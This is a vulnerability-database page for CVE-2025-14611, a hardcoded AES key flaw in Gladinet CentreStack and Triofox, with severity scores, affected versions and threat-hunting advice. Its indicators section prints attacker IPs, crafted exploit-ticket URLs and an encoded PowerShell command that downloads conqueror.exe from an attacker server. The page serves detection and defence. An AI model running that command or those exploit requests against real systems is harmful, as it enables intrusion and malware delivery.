cbcvebase.
CVE-2025-14611
published 2025-12-12

CVE-2025-14611: Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades…

PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-01-05
Exploited in the wild
EPSS
50.95%
98.8th percentile
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.

Affected

3 ranges
VendorProductVersion rangeFixed in
gladinetcentrestack< 16.12.10420.5679116.12.10420.56791
gladinetcentrestack_and_triofox< 16.12.10420.5679116.12.10420.56791
gladinettriofox< 16.12.10420.5679116.12.10420.56791

Detection & IOCsextracted from sources · hover to see the quote

ip147.124.216.205
ip185.196.11.207
ip146.70.134.50
urlhttp://185.196.11.207:8000/conqueror.exe
hashe9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5
filenameconqueror.exe
pathC:\Users\Public\conqueror.exe
pathC:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config
url/storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu
url/storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsukOQzFIwOzIHswJBdS7w0RY
url/storage/filesvr.dn t=t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m4mxEjYeJuI6Nk:xBHQQ1c6Hzjx3OsG4T044CP5qZ9Qr
command"C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=
yara
regex: 'decryptionKey="([A-Fa-f0-9]+)"'
  • Hunt for requests to /storage/filesvr.dn with a `t` query parameter in IIS logs — this is the vulnerable HTTP handler endpoint. Tickets with a timestamp of year 9999 indicate a crafted never-expiring exploit ticket.
  • Look for Windows Application Event Log Event ID 1316 to identify ViewState deserialization exploitation attempts; the event captures the encoded payload and source IP.
  • Audit file access logs for unauthorized reads of web.config, particularly at C:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config, which contains machine keys used for ViewState deserialization attacks.
  • Review Access Tickets for year 9999 timestamps in the `t` parameter of filesvr.dn requests as a high-fidelity indicator of exploitation.
  • The exploit ticket's `t` parameter uses URL-safe character substitution (`:` replaces `+`, `|` replaces `/`) before Base64 decoding — detection rules should account for this encoding when parsing IIS logs.
  • Check for web.config exfiltration attempts and rotate all stored credentials and API keys if web.config access is confirmed.
  • ·The Username and Password fields in observed exploit tickets were left blank. When empty strings are passed, impersonation logic may fail and fall back to the IIS Application Pool Identity, meaning exploitation does not require valid credentials.
  • ·Attribution to the cl0p ransomware group for the December 15 incidents is unconfirmed at time of reporting; treat the associated IPs and conqueror.exe payload as high-confidence IOCs but actor attribution as tentative.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.07.1HIGHCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:A/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck7.1HIGH
cisa7.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.